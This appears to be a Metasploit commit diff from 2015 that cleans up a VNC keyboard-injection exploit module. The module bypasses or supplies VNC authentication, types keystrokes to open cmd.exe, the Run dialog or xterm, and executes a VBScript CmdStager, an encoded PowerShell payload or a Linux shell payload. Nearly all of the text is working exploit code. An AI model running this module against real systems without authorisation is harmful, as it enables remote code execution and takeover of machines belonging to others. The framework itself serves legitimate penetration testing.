Do code cleanup

bug/bundler_fix
jvazquez-r7 2015-07-10 18:35:13 -05:00
parent 917282a1f1
commit 1326a26be5
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 42 additions and 55 deletions

View File

@ -9,6 +9,9 @@ require 'rex/proto/rfb'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
WINDOWS_KEY = "\xff\xeb"
ENTER_KEY = "\xff\x0d"
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
@ -24,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' => [ 'xistence <xistence[at]0x90.nl>' ],
'Privileged' => false,
'DefaultOptions' => { 'WfsDelay' => 20 },
'License' => MSF_LICENSE,
'Platform' => %w{ win unix },
'Targets' =>
@ -39,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
Opt::RPORT(5900),
OptString.new('PASSWORD', [ false, 'The VNC password']),
OptInt.new('TIMEWAIT', [ true, 'Time to wait for payload to be executed', 20])
OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
], self.class)
end
@ -57,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
keyboard_key = "\x04\x00" # Release key
keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
keyboard_key << key # The keyboard key
# Press the keyboard key. Note: No receive is done as everything is sent in one long data stream
# Release the keyboard key. Note: No receive is done as everything is sent in one long data stream
sock.put(keyboard_key)
end
@ -68,34 +72,31 @@ class Metasploit3 < Msf::Exploit::Remote
press_key("\x00#{value}")
release_key("\x00#{value}")
end
press_key(@enter_key)
press_key(ENTER_KEY)
end
def start_cmdprompt
def start_cmd_prompt
print_status("#{rhost}:#{rport} - Opening Run command")
# Pressing and holding windows key for 1 second
press_key(@windows_key)
select(nil, nil, nil, 1)
press_key(WINDOWS_KEY)
Rex.select(nil, nil, nil, 1)
# Press the "r" key
press_key("\x00r")
# Now we can release both keys again
release_key("\x00r")
release_key(@windows_key)
release_key(WINDOWS_KEY)
# Wait a second to open run command window
select(nil, nil, nil, 1)
exec_command("cmd.exe")
exec_command('cmd.exe')
# Wait a second for cmd.exe prompt to open
select(nil, nil, nil, 1)
Rex.select(nil, nil, nil, 1)
end
def exploit
begin
@enter_key = "\xff\x0d"
@windows_key = "\xff\xeb"
alt_key = "\xff\xe9"
f2_key = "\xff\xbf"
password = datastore['PASSWORD']
@ -104,85 +105,71 @@ class Metasploit3 < Msf::Exploit::Remote
vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)
unless vnc.handshake
print_error("#{rhost}:#{rport} - #{vnc.error}")
return
fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC Handshake failed: #{vnc.error}")
end
unless password.nil?
if password.nil?
print_status("#{rhost}:#{rport} - Bypass authentication")
# The following byte is sent in case the VNC server end doesn't require authentication (empty password)
sock.put("\x10")
else
print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server")
if vnc.authenticate(password)
print_status("#{rhost}:#{rport} - Authenticated")
else
print_error("#{rhost}:#{rport} - #{vnc.error}")
return
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - VNC Authentication failed: #{vnc.error}")
end
else
print_status("#{rhost}:#{rport} - Bypass authentication")
# The following byte is sent in case the VNC server end doesn't require authentication (empty password)
sock.put("\x10")
end
# Send shared desktop
unless vnc.send_client_init
print_error("#{rhost}:#{rport} - #{vnc.error}")
return
fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC client init failed: #{vnc.error}")
end
if target.name =~ /VBScript CMDStager/
start_cmdprompt
start_cmd_prompt
print_status("#{rhost}:#{rport} - Typing and executing payload")
execute_cmdstager({:flavor => :vbs, :linemax => 8100})
# Exit the CMD prompt
exec_command("exit")
exec_command('exit')
elsif target.name =~ /Powershell/
start_cmdprompt
start_cmd_prompt
print_status("#{rhost}:#{rport} - Typing and executing payload")
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true})
# Execute powershell payload and make sure we exit our CMD prompt
exec_command("#{command} && exit")
elsif target.name =~ /Linux/
print_status("#{rhost}:#{rport} - Opening \"Run Application\"")
print_status("#{rhost}:#{rport} - Opening 'Run Application'")
# Press the ALT key and hold it for a second
press_key(alt_key)
select(nil, nil, nil, 1)
Rex.select(nil, nil, nil, 1)
# Press F2 to start up "Run application"
press_key(f2_key)
# Release ALT + F2
release_key(alt_key)
release_key(f2_key)
# Wait a second for "Run application" to start
select(nil, nil, nil, 1)
Rex.select(nil, nil, nil, 1)
# Start a xterm window
print_status("#{rhost}:#{rport} - Opening xterm")
exec_command("xterm")
exec_command('xterm')
# Wait a second for "xterm" to start
select(nil, nil, nil, 1)
Rex.select(nil, nil, nil, 1)
# Execute our payload and exit (close) the xterm window
print_status("#{rhost}:#{rport} - Typing and executing payload")
exec_command("nohup #{payload.encoded} &")
exec_command("exit")
exec_command('exit')
end
# Wait up to X seconds, else might timeout/disconnect before full payload is typed
select(nil, nil, nil, datastore['TIMEWAIT'])
(datastore['TIME_WAIT']).times do
Rex.sleep(1)
# Success! session is here!
break if session_created?
end
handler
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
print_error("#{rhost}:#{rport} - #{e.message}")
fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
ensure
disconnect
end